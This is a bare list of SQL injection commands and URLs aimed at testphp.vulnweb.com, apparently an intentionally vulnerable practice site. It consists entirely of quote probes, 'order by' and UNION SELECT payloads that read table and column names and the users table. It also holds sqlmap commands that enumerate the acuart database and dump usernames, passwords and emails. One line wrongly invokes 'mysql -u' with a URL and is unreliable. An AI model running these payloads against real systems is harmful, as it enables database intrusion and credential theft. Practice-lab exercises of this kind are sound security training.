http://testphp.vulnweb.com/artists.php?
artist=-1
http://testphp.vulnweb.com/artists.php?artist=1'
http://testphp.vulnweb.com/artists.php?artist=-1'
mysql -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --
columns
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C
uname --dump
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C
pass --dump
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C
email --dump
http://testphp.vulnweb.com/artists.php?artist=1 order by 3--
http://testphp.vulnweb.com/artists.php?artist=1 union select
1,2,group_concat(table_name) from information_schema.tables where
table_schema=database()--
http://testphp.vulnweb.com/artists.php?artist=1 union select
1,2,group_concat(column_name) from information_schema.columns where
table_name="users"--
http://testphp.vulnweb.com/artists.php?artist=1 union select
1,2,group_concat(uname) from users--